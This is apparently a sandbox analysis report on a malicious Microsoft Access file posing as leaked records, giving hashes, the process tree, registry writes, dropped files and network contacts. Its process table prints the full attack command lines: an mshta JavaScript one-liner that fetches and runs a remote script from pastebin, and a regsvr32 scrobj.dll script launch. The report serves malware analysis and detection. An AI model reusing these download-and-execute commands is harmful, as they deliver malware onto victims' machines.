| Field | Value |
|---|---|
| File name | Leaked_Records_15072019_Col.accdb |
| Full analysis | https://app.any.run/tasks/ccbb2180-78e2-469a-9d9e-856ee3f73e56 |
| Verdict | Malicious activity |
| Analysis date | July 17, 2019, 13:39:12 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/x-msaccess |
| File info | Microsoft Access Database |
| MD5 | BEFC603B7E59E0B739AE150FFC0CAD3A |
| SHA1 | 4BF499C320E6806E877E68876A3BEB2ADA2A45AC |
| SHA256 | 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C |
| SSDEEP | 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ |
| Extension | Description |
|---|---|
| .accdb | Microsoft Access 2007 Database (90.4) |
| .pi2 | DEGAS med-res bitmap (9.5) |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3544 | `"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.accdb` | C:\Windows\system32\rundll32.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3276 | `"C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.accdb"` | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Access; Version: 14.0.6024.1000 |
| 1080 | `"C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close();` | C:\Windows\System32\mshta.exe | | MSACCESS.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 3052 | `"C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();` | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
| 1876 | `"C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll` | C:\Windows\System32\regsvr32.exe | — | cutil.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft(C) Register Server; Exit code: 5; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 3544 | rundll32.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithProgids | write | Access.Application.14 | |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | LangID | 0904 |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | Microsoft Access |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Adobe Acrobat Reader DC |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Windows\eHome\ehshell.exe | Windows Media Center |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Program Files\Internet Explorer\iexplore.exe | Internet Explorer |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Windows\system32\mspaint.exe | Paint |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Windows\system32\NOTEPAD.EXE | Notepad |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\PROGRA~1\MICROS~1\Office14\OIS.EXE | Microsoft Office 2010 |
| 3544 | rundll32.exe | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | write | C:\Program Files\Opera\Opera.exe | Opera Internet Browser |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3276 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF3D6.tmp.cvr | — | — | — |
| 3052 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | 91456160503D1965136BBE939606878E | 350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 |
| 3276 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | 5DD1E148840C367A82F4A1BE6926825F | D4787D4F6ACCCDA7CF06F147598D637EE996543A2FB62E9023D3915512DC064F |
| 3052 | cutil.exe | C:\Users\admin\AppData\Local\logs.tmp | text | 626C22DE97EEC542521DC24103DAA418 | 85287E7301D3983BBE6A95B4FA6F6451DB816E33F9366E27E561711B505F14C7 |
| 1080 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | executable | E2FE656A79D8F4C4FD70201E7423BDA0 | DB40B518DEB81B146CC81B0C360AECC84204E3CDC108B1F5F158EE60C1792806 |
| 3052 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | 3739532BDF9B523E245EEEDD062AB5FF | 544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 |
| 3052 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | 7C2325BAB482DD93B5B9BC66B17CFA13 | BA58614D2FD06B0D8E0955CA3820839D06F5FF41331892FE0D62BEDC8022BFEA |
| 3276 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | 31AEFA424BD036B40F8B9B64C1C9F78F | 67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3052 | cutil.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
| Domain | IP | Reputation |
|---|---|---|
| pastebin.com | | shared |
| Process | Message |
|---|---|
| MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |